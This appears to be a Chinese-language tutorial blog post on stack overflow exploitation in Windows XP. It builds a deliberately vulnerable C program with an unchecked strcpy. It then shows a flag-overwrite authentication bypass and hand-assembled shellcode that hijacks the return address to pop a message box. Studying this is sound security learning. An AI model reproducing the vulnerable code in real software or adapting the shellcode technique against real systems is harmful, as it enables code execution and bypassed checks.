winXP栈溢出漏洞深度学习

一:环境

windowsXP,vc6,ollydbg,ultraedit

二:覆盖邻接变量

原理:利用strcpy函数不会检查长度的漏洞,覆盖临近数组的flag变量,从而绕过验证

先构建一个漏洞程序

因为栈的生长方向是从高地址到低地址的,也就是先声明的变量在高地址,后声明的变量在低地址

栈向下生长,但数组向上溢出,我们的buffer数组预先只定义了44个字节的位置,所以buffr数组溢出的第一个字节就是flag的位置

在vc6里面新建一个空项目,添加一个.c文件

复制代码
#include <stdio.h>
#include <windows.h>
#include <string.h>

#define REGCODE "12345678"

int verify(char *code)
{
    int flag;    //邻接变量,位于buffer下方
    char buffer[44];    //缓冲区,共44字节
    flag = strcmp(REGCODE, code);
    strcpy(buffer, code);    //无长度检查的strcpy函数
    return flag;    //是否通过验证
}

void main()
{
    int vFlag = 0;
    char regcode[1024];
    FILE *fp;
    
    LoadLibrary("user32.dll");
    
    if (!(fp = fopen("reg.txt", "r+")))
        exit(0);
    
    fscanf(fp, "%s", regcode);
    //fp:文件指针
    //fscanf会在字符串末尾自动添加'\0'
    vFlag = verify(regcode);
    
    if (vFlag)
        printf("wrong regcode!");
    else
        printf("passed!");
    
    fclose(fp);
}

编译

在debug文件同层创建一个reg.txt,写入密码12345678,运行看看有没有问题

正常

输入44个'1',填充44个字节没因为fscanf会自动在末尾加上\0,这个\0会覆盖flag的最低位,把flag从1变成0,表示验证通过了

防御方向:限制复制长度

二:植入shellcode(运行漏洞程序后令win系统弹出弹窗)

user32.dll:win动态链接库,包含messageboxa函数

MessageBoxA:是Windows 系统中弹出提示框的 API 函数。调用它就能显示一个窗口

实现思路:后面的 shellcode 需要直接调用 MessageBoxA,但代码里不能写函数名(因为植入的是机器码),必须知道它在内存中的入口地址,然后让程序跳转到这个地址去执行。

所以我们先通过这个c代码得到

在 Windows XP 中,user32.dll 的加载基址是 0x77D10000。

MessageBoxA 在 user32.dll 中的偏移是 0x000407EA。

入口地址 = 基址 + 偏移 =0x77D10000 + 0x000407EA = 0x77D507EA

ollydbg打开exe文件,在菜单的试图里面找到调试窗口→watch

在watch窗口里面搜一下&buffer

得到buffer的地址:0x0012faf0

开始构建shellcode,首先,调用MessageBoxA函数,我们需要四个参数:

|---|-----------------|---------------------------------------------|
| 1 | hWnd------父窗口句柄 | 指定哪个窗口作为消息框的父窗口,这个实验我们传进去0/NULL,表示这是一个独立的窗口 |
| 2 | IpText | 显示的文本 |
| 3 | IpCaption | 标题栏文字 |
| 4 | uType | 按钮类型,这个实验传0,代表只显示确定按钮 |

在win中,压栈顺序是从右往左,所以参数顺序是4321,之后就可以调用MessageBoxA

在压到3,2参数部分的时候,要对字符串进行处理,要先把字符串写入栈内存,再把字符串的地址作为参数进行传递

顺序如下:

汇编 机器码 作用
XOR EBX, EBX 33 DB EBX = 0
PUSH EBX 53 压入 uType=0(参数4)
PUSH 0x74736577 68 77 65 73 74 压入 "west"
PUSH 0x74736577 68 77 65 73 74 压入 "west"
MOV EAX, ESP 8B C4 EAX = 字符串地址
PUSH EBX 53 压入 hWnd=0(参数1)
PUSH EAX 50 压入 lpText(参数2)
PUSH EAX 50 压入 lpCaption(参数3)
PUSH EBX 53 压入 uType=0(参数4)
MOV EAX, 0x77D507EA B8 EA 07 D5 77 函数地址入 EAX
CALL EAX FF D0 调用

以上0~25这段机器码就是弹窗部分

26~43内18个字节用90填充,表示NOP指令,什么都不做

44~47内四个字节用90填充,覆盖旧的flag

48~51四个字节用90填充,覆盖旧的EBP栈顶指针

(因为返回地址再flag和EBP后面,要覆盖返回地址,必须先把前52个字节填满,90=NOP(空操作),CPU执行到这里什么都不做,继续往下)

52~55四个字节填充 F0 FA 12 00,表示返回地址→指向buffer[0]

打开UltraEdit,CTRL+G进入十六进制,开始填充机器码

之后保存到debug的同层------reg.txt

再次运行程序,成功跳出弹窗

相关推荐
国科安芯6 小时前
空间激光通信系统中抗辐射 MCU 芯片应用研究
单片机·嵌入式硬件·架构·risc-v·安全性测试
一名优秀的码农7 小时前
vulhub系列-82-doubletrouble: 1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
一个脚本boy7 小时前
【渗透测试中收集信息命令并利用漏洞与提权命令总结基础版(适合新手入门学习渗透测试)】
学习·web安全·网络安全
一名优秀的码农7 小时前
vulhub系列-81-Os-hackNos-3(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
2401_873479401 天前
企业安全团队如何配合公安协查?IP查询在电子取证中的技术实践
tcp/ip·安全·网络安全·php
网安情报局1 天前
如何选择合适的AI大模型:快快云安全AI大模型聚合平台全解析
人工智能·网络安全·ai大模型
忡黑梨1 天前
eNSP_从直连到BGP全网互通
c语言·网络·数据结构·python·算法·网络安全
其实防守也摸鱼1 天前
带你了解与配置phpmyadmin
笔记·安全·网络安全·pdf·编辑器·工具·调试
菩提小狗1 天前
每日安全情报报告 · 2026-04-27
网络安全·漏洞·cve·安全情报·每日安全